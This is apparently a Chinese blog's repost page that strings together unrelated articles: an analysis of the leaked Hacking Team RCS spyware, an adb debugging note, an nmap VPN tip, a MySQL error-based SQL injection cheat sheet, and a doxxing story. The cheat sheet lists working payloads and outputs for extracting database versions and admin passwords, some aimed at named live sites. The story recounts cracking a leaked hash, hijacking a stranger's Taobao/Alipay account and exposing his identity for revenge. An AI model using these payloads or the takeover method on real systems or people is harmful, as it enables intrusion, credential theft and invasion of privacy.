分类 转载 下的文章

HACKING TEAM RCS 描述备份

来自于 Wooyun Drops 存档

前言

7月5日晚,一家意大利远程控制软件厂商HackingTeam的内部数据被泄露出来,其影响力不亚于斯洛登事件及维基解密事件,绿盟科技威胁响应中心随即启动应急响应工作。
6日,威胁响应中心启动应急分析工作,绿盟TAC产品拦截到Flash 0Day漏洞攻击;
6日夜,相关信息及初步建议,第一时间告知客户关注;
7日,在官网网站发布紧急通告,建议广大用户关注事件进展。分析工作进展进展中;
9日,发布Hacking Team远程控制系统简要分析报告;
这是一份快速报告,以便简要分析其中的核心内容,Hacking Team RCS(远程控制系统)。

泄露:Hacking Team

7月5日晚,一家意大利软件厂商被攻击,其掌握的400GB漏洞(包括0day)数据泄露出来,由此可能引发的动荡,引起了业界一片哗然。数据包中主要包含几个大的部分:

  • 远程控制软件源码,也是其核心,暂且称之为 Hacking Team RCS
  • 反查杀分析工具及相关讨论文档
  • 0Day、漏洞及相关入侵工具
  • 入侵项目相关信息,包括账户密码、数据及音像资料
  • 办公文档、邮件及图片
  • 其他

Hacking Team

Hacking Team在意大利米兰注册了一家软件公司,主要向各国政府及法律机构销售入侵及监视功能的软件。其远程控制系统可以监测互联网用户的通讯、解密用户的加密文件及电子邮件,记录Skype及其他VoIP通信,也可以远程激活用户的麦克风及摄像头。其总部在意大利,雇员40多人,并在安纳波利斯和新加坡拥有分支机构,其产品在几十个国家使用。

分析:远程控制系统

大家知道IT运维管理中常常用到远程控制软件,比如Dameware,但Hacking Team RCS相比市面上常见的远程控制软件而言,主要区别如下:

  • 系统化管理该软件从入侵到目标信息收集分析,有完整的体系架构,这个架构中有不同的功能模块,彼此之间相互配合,完成入侵、安装、信息搜集、监控、集中管理等功能。
  • 收集信息该软件在后台收集并上传目标用户的信息,包括各类数据、图片、影音等
  • 入侵工具配合该软件有各种漏洞、利用手段及自动化工具,以便在目标上强制安装Agent
  • 适应能力强桌面OS从Windows到MacOs X,手机OS基本覆盖了市场上流行的系统
  • 反追踪该软件本地及传播过程数据均加密,让追踪者难以找到攻击者
  • 反卸载反查杀该软件Agent不提供卸载方式,并采用各种手段躲避杀毒软件

Hacking Team RCS系统架构

RCS (Remote Control System)系统是一套用于政府拦截的黑客套件,实现了全平台的监控系统。
RCS主要组件
每一块组件具体的功能如下,

  • Front-End: 接收运行在被截取设备上的代理,作为Back-End的隔离屏障,保证RCS安装的安全性。系统要求是Windows 2003 or 2008。
  • Back-end: 是整个设施的核心,它存储所有从代理收集到的数据同时处理从管理控制台传来的请求。所有的RCS数据存储里面一个标准的关系型数据库,因此该服务还提供额外的功能,比如根据客户的要求实现自动备份和定制数据挖掘。系统要求是Windows 2003 or 2008。
  • Management console: RCS的控制台是用于访问和控制所有的远程控制系统(RCS)功能的应用程序。Operators可以授予系统不同等级的访问权限:Admin可以创建用户和组,授予权限,管理调查,审核系统;Technician是创建目标感染、配置/重新配置代理行为的载体;Viewer浏览来自target的信息,对其进行分类或者输出。系统要求是Windows, MacOS X or Linux。
  • Target: RCS Agent是监视目标计算机或智能手机上的软件组件。一旦安装成功,Agent将会通过设备的网络将收集到的数据传送到Front-End,这些数据有很多种类,比如屏幕截图、电话呼叫等。
    RCS Agent有两种安装方式:本地以及远程。

本地安装主要是通过桌面系统的CD和USB存储设备来引导,或者是智能手机的usb。远程安装则通过Melting tool、Exploit portal、Network Injector以及Remote Mobile Installation。而且每个RCS Agent都可以通过远程命令卸载。
RCS Agents的系统要求:

Windows XP, Vista, 7 (32/64 bit)
MacOs X 10.6 Snow Leopard, 10.7 Lion
Windows Mobile 6, 6.5
iOS 3, 4 (iPhone/iPad)
Symbian S60 3rd and 5th edition
BlackBerry 4.5 or newer

Anonymizers 目的是隐藏Front End真实IP地址,由于Anonymizers之间的连接数据被完全加密而且没有解密数据,所以可以被放置在任何非信任的网络和国家。

Collection Node 信息搜集功能是通过Collection Node来完成的客户端上传信息的搜集,并且允许客户端从服务器上下载新的配置和插件,这个节点是通过提供ASP服务完成交互的。这个节点是整个控制系统唯一能从外部进行访问的节点,因此对它的保护也非常关键,比如使用防火墙等措施进行一定的隔离,也需要使用到Anonymizer 链来对ASP真实的IP地址进行隐藏。

RSSM(Mobile Collection Node)作为Collection Node的一个补充,通过蓝牙等手段完成Collection Node的功能,并且该节点也会和Collection Node完成同步的过程。

Log Repository Log Repository(RCSDB)是RCS系统的存储部件,存储信息包括:

  • 访问过的网站
  • 文件操作
  • 键盘记录
  • 文档和图片信息
  • VoIP电话监控(例如skype)
  • 程序执行信息
  • 音频监视
  • Web摄像头监视
  • 截屏
  • 即时通信(Skype、WindowsLiveMessenge、Wechat等)
  • 剪贴板的信息
  • 密码信息(email账户、WindowsLive账户等)
  • 发送和接收邮件
  • 电话录音
  • GPS位置
  • 联系人信息

从上面的分析可以看出来,这一次泄露的Hacking Team的各种程序中,比较完整的涵盖了实施攻击各个阶段需要用到的一些控制和利用工具,针对其中的一些较为经典的代码,我们经过研究,给出这些工具包的功能,对使用范围做了大致的描述。在这一套RCS里,针对电话、pc、网络均进行了控制和信息搜集。

Hacking Team RCS基本功能

电话监控

针对电话监控,开发了针对不同平台的agent程序,下面是一份列表

  • core-winphone: 针对 Windows Phone 移动平台的远程控制木马客户端,用于实时收集目标系统状态信息,GPS,通讯录,通话短信记录,日历日程安排等隐私信息,还可以执行录音,截取手机屏幕等定时任务,具有远程打开手机摄像头,开启话筒等功能。
  • core-winmobile: 针对已经过时的 Windows Mobile 移动平台的远程控制木马客户端。也是用于收集目标隐私信息,且具有远程控制收集录音,截屏等功能。
  • core-symbian: 针对 Symbian 移动平台的远控木马代理,用于收集GPS位置,通讯记录,短消息等敏感记录,并可远程实时监听话筒等功能。
  • core-android-audiocapture: 安卓平台下的语音监听工具,通过注入AudioFlinger相关进程达到记录麦克和听筒音频的功能。整个工具包含注入工具hijack、被注入的库libt.so,注入后会记录音频信息到dump文件,黑客通过decoder.py脚本可以将dump文件还原成wav文件。可以在安卓3.x到4.x下运行。
  • core-android: 一个安卓下的RCS应用,应该是功能比较完善的工具,可以收集社交软件的信息,应用中还打包了许多利用工具
  • core-blackberry: 是黑莓下的RCS软件。

桌面系统监控

  • core-macos: 其中包含一个用于Max OS X 平台可执行文件 macho 文件的加壳加密混淆程序。同时还包含针对 Mac OS X 平台的远程控制木马客户端程序,用于收集目标系统网络连接,文件系统等信息,还可以窃取iMessage,Skype,剪贴板等应用的敏感信息,同时还可以键盘记录,截屏,打开摄像头等。
  • core-win32: windows平台木马,主要功能包括:1.窃取主流浏览器如Chrome、FireFox和IE 的Cookies等信息2.对用户GMail、Outlook、Facebook、Twitter、MSN、Skype、ICQ、Yahoo、Google Talk、Mozilla Thunderbird等使用进行监控,收集相关信息收集如:帐号信息、相关联系人信息等。监控的MSN版本从6.0到2011,Yahoo Messager版本从7.x到10.x,ICQ Messenger v7.x 3.对麦克风和摄像头进行监控
  • core-win64: 和core-win32对应,同样是windows平台木马,但项目只是包含了64位系统特有的api hook框架.
  • soldier-win: windows平台木马,功能包括:获取目标计算机基本信息窃取浏览器chrome、firefox、IE密码和cookies窃取facebook、gmail、twitter、Yahoo相关信息屏幕监控、摄像头监控等
  • scout-win: windows平台木马,功能相对简单:screenshot、获取目标计算机的基本信息如:CPU,内存,用户名等信息。具有少量简单的反检测机制,如AntiVM、动态获取API地址、黑名单等。子项目VMProtectDumper是针对某一版本VMProtect的脱壳机

辅助入侵功能

为了在target上安装受控端软件并获取主机控制权,还有提供了一些必要的功能

  • driver-macos: 包含一个 Mac OS X 平台的内核级 Rootkit ,具有用户进程隐藏,文件系统隐藏等功能,还可以 hook 系统调用, mach_trap_table ,并实时追踪用户空间后门的运行状态。
  • core-packer: 用于Windows 平台 PE 可执行文件的加壳,加密混淆程序。
  • core-android-market: 应该是安卓下的类似推送新闻的应用,包括一个名为org.benews.BeNews的安卓端的apk应用和本地运行的server,通讯数据为bson格式。apk应用具有自启动功能,会启动推送服务
  • core-android-native: 卓相关利用工具的集合,包含了所有安卓4.1版本以前的利用工具,包括了put_user_exploit、towelroot中的利用工具、selinux的利用工具等
  • vector-ipa: ipa是 Injection Proxy Appliance 的缩写, Injection Proxy Appliance是RCS系统一部分。

RCS Injection Proxy Appliance (RCS IPA)是用于攻击的安全设备,使用中间人攻击技术和streamline injection机制,它可以在不同的网络情况下透明地进行操作,无论是在局域网还是内部交换机上。
IPA 可从监控的网络流量中检测HTTP连接,进行中间人攻击,主要有三种攻击方式: 注入EXE, 注入html和替换攻击。当监控的HTTP连接命中预先设置的规则时,IPA 将执行注入攻击。IPA 可以设置需要注入的用户(如IP地址),资源(如可执行文件)等规则。

  • driver-win32: core-win32对应的内核驱动模块,提供功能诸如:权限提升、操作敏感注册表、恢复SSDT等。
  • driver-win64: 相对32位版本的驱动,只是注释掉了很多功能代码。
  • vector-silent: 木马辅助程序:Dropper和depacker
  • vector-applet: 应该是用于挂马的Java Applet。使用的有可能是未知漏洞,漏洞在twostage和weaponized文件夹下的readme中油描述,”通过XMLDecoder获取一个Bridge实例的引用,从而导致一个类混淆”。
  • vector-edk: Intel UEFI(统一可扩展固件接口)BIOS后门植入工具
  • vector-offline2: 离线安装RCS工具包,可在物理接触时植入RCS后门。 可将离线安装工具刻录在CD-DVD/USB等可引导介质上,当可物理访问到计算机系统时,可利用该介质启动系统,将后门直接植入计算机中的操作系统中。目前支持对Linux/OS X/Windows系统的离线安装。提供了友好的图形界面,可自动识别计算机上存在的不同操作系统,并可识别每个操作系统上存在的用户,然后可针对不同用户分别植入不同类型的后门。
  • vector-offline: Windows版的离线安装工具源码。
  • vector-recover: 一个Windows版的下载器。下载器本身会修改图标和版本信息,将自己伪装成东芝的蓝牙助手具: btassist.exe。下载器本身会循环访问两个地址的固定URL: GET /gh/3735928545/deadbee2判断下载数据的前32字节是否是”3j9WmmDgBqyU270FTid3719g64bP4s52″,如果是的话会从第33字节开始保存后续数据到临时目录下的msupd64.exe文件中,然后执行该文件。
  • vector-rmi: 一个发送WAP PUSH信息的命令行工具,可以将链接以短信形式发送到支持WAP PUSH功能的手机上。可自定义各种参数。

Hacking Team RCS入侵手段

Hacking Team RCS软件入侵目标,主要通过如下三种方式:

感染移动介质

与很多木马、病毒及流氓软件的传播方式一样,该软件首先还是采取这种低成本的方式进行,感染一些能够接触目标的移动媒体,比如CD-ROM、USB等,即便是OS 或者BIOS设置了密码也一样可以感染,从而获取一些环境数据,比如电脑是否可以上网等,为后续的动作提供参考依据。

代理攻击

采用软件或硬件的系统,能够在网络会话过程中修改和注入数据,在某些情况下,可以注入到系统并难以被检测到。同时,也能够感染Windows平台上的可执行文件,如果目标电脑从网站上下载并执行这些可执行文件时,Agent将在后台自动安装,用户不会知晓。

APT

如上两种方式都无法奏效的时候,就会采用多种形式组合入侵,采用相关的漏洞、入侵工具及更多利用手段,详细的分析及防护方案,在后续的报告中呈现。

Hacking Team RCS信息上传

用于搜集客户端搜集信息的上传通道,是一个强加密和需要认证的通信过程,同时整个上传通道的设计是基于复杂网络环境的,考虑到防火墙、带有域认证功能的代理等等,会通过模仿一个正常用户浏览web的过程来进行这一些操作。
信息搜集功能是通过Collection Node来完成的客户端上传信息的搜集,并且允许客户端从服务器上下载新的配置和插件,这个节点是通过提供ASP服务完成交互的。这个节点是整个控制系统唯一能从外部进行访问的节点,因此对它的保护也非常关键,比如使用防火墙等措施进行一定的隔离,也需要使用到Anonymizer 链来对ASP真实的IP地址进行隐藏。
RSSM(Mobile Collection Node)作为Collection Node的一个补充,通过蓝牙等手段完成Collection Node的功能,并且该节点也会和Collection Node完成同步的过程。

[Android] adb logcat 调试

手机打开 USB 调试连接电脑.
CMD => adb devices
comment
X2xxxx device 这个设备就是被调试的手机.
如果没看到这个, 需要检查手机是否正确连接到了电脑上.
CMD => adb logcat
等一会让程序把缓冲区的日志信息刷完, 刷完后可以看到刷新的频率没有那么高了.
在手机上打开要调试的应用, 完成测试步骤. 回到 CMD 按 CTRL+C 中断程序.
把 CMD 显示的信息 COPY 出来, 搜索包名, 把包名之前的无用信息全部删掉.
手动筛选余下的信息. 找到自己需要的日志.
本次调试应对使用 Intel XDK, 以及 PhoneGAP 和 LiveLayout 以及 XDK APP 调试都能正常使用.
但是使用 Cordova 打包成 APP 后在 Android 上却不能正常使用 jQuery .
根据 logcat 提取出来的日志显示, APP 在启动后并未能加载 jQuery 插件. 定位文件发现没有 jQuery 文件夹, 为小写的 jquery.
将 jquery 改为 jQuery 重新打包后程序运行正常.
comment

在 VPN 环境下使用 Nmap

<p>

Title:  scan host with vpn

</p>
<p>

Author: Nixawk

</p>
<p>

Only ethernet devices can be used for raw scans on Windows, and "ppp0" is not an ethernet device.

</p>
<p>

Use the --unprivileged option for this scan.

</p>
<p>

QUITTING!

</p>
<p>

====================================================

</p>
<p>

Platform:
windows 7

</p>
<p>

Methods:
nmap -iflist
nmap -v -e ppp0 --unprivileged -n -T4 -Pn x.x.x.x    # ppp0 is your interface.

====================================================
</p>
<p>

References:

http://seclists.org/nmap-dev/2009/q3/617
转载于: http://blog.csdn.net/nixawk/article/details/43446931
</p>

MySQL 5.1+ 数据库报错注入利用

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

举例如下:

  首先进行正常查询

mysql> select * from article where id = 1;
+—-+——-+———+
 | id | title | content | 
+—-+——-+———+ 
| 1 | test | do it | 
+—-+——-+———+

  假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

  可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。 

  例如我们需要查询管理员用户名和密码:

Method1: 
  mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key 'group_key'
Method2: 
  mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue 

测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml 

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error:Duplicate column name ‘5.0.27-community-nt’Error:Duplicate column name ‘5.0.27-community-nt’
?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error:Duplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′

转载来源不详, 地址:http://www.dreaminto.com/2013/0620/753.html

另外一篇更加详细的

1、通过floor暴错 

/*数据库版本*/

http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 /*简单办法暴库*/ 

http://www.waitalone.cn/sql.php?id=info()

/*连接用户*/

http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/*连接数据库*/ 

http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/*暴库*/ 

http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 /*暴表*/

http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/*暴字段*/

http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 /*暴内容*/ 

http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

2、ExtractValue(有长度限制,最长32位)

http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e, (select @@version),0x7e)) http://www.waitalone.cn/sql.php?id=1+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))

3、UpdateXml(有长度限制,最长32位)

http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) http://www.waitalone.cn/sql.php?id=1+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

4、NAME_CONST(适用于低版本)

http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

5、Error based Double Query Injection(http://www.vaibs.in/error-based-double-query-injection/)

 /*数据库版本*/

http://www.waitalone.cn/sql.php?id=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

转载地址: http://www.waitalone.cn/mysql-error-based-injection.html | 独自等待-信息安全博客

论如何抓出一只少男杀手

月黑风高的8月16日晚,一位刚被扣上绿帽子的痛苦电竞圈少男找到了我,想让我帮忙射来那对狗男女的资料照片神马的在电竞圈公之于众。
我就叫上u酱和一个小表弟一起开始搞这对屌毛。
我搞男的而u酱他们搞女的那边,通过各种搜索引擎、社工库等,射出了一堆信息,并且还找到了他的一个几年前常用 ID:codz24 和 codz240。
并破解搜库子搜出来的MD5,其他md5都解不开,只能解开这一个superand24,并逐一测试在百度 社工库里收集到的他的账号 邮箱等。 00 在163邮箱中发现有淘宝发来的一些广告邮件,由此可以推出此人在淘宝有注册过。
此时那个我们也成功进入了目标男资料卡里公开展示的一个QQ群,进去后把成员表发给了我,由于该电竞圈我也有参与,所以比较了解这个圈子的一些八卦事。 01 在淘宝尝试用密码登陆,登陆不上去,就找回密码,并防止目标发现,在邮箱中设置了一下密保。 03 找回密码后进入淘宝,通过淘宝进入支付宝,并在淘宝界面看到了最近有购买过胸罩,可惜是A&B罩杯的,好小..差评!
并在淘宝里看到了所有详细资料 周*,1890671****,, 湖南省 楼底(音译)市 鑫华(音译)縣 尚美鎮嘞鞍排放**號(音译),213***
以及身份证号 和另一个姓名 是在支付宝里认证的姓名:赵* 我最初以为赵*是这个妹子的名字,而周*是他父亲或其他什么鬼...
但事情没这么简单,在绑定的身份证号中我发现了一个问题,这是一个男的的身份证。此时我又通过百度搜索这个妹子的QQ搜到了他在一个论坛发过的帖子,里面出现了一个昵称,天上**,这个天上**是我们这个电竞圈比较出名的一个汉子..而此时我在翻阅射进他的百度账号时发现,他的说话方式和天上**非常像,越想越奇怪,后来经过圈内打听才知道,原来天*有冒充妹子勾搭人的习惯。。 04 另外为了证明这个身份证号是这个妹子的,证明这个妹子是男的,是天*勾搭汉子的小号,我管戴绿帽子的这个朋友问来了”妹子”的生日,果然和身份证还有百度账号上设置的吻合。此时我又想起,当时混进去那个资料卡上展示的群里,应该有天*的,但并没有,而是有这个妹子号,这也就吻合了天*就是那个”妹子“,因为他没必要开两个号来一个群,而且这也是不被群管理允许的。我把这些告诉朋友之后仿佛晴天霹雳,和一个男的谈了很久的恋爱...而且这个男的居然还买胸罩,怪不得买A杯,而且这个号经常在网络上发布一些很萌的妹子语气帖子,更是让我一阵发麻...为了证明这些胸罩什么的是这个妹子买的,特意去跟他大张旗鼓公开的宣布我们把它搞了,看到他说,搞了就搞了吧,反正我也被搞了好几次了,而不是反驳,语气符合一个被搞之后的人的心理,可以证明这个号就是他的。不禁感觉,我好像挖出了一个可怕的少男杀手小变态..把这些说给朋友后,也就结束了。世风日下啊....
#################
作者: ZiWen
排版修改: Sys7em.info
说明: 已对当事人相关信息进行处理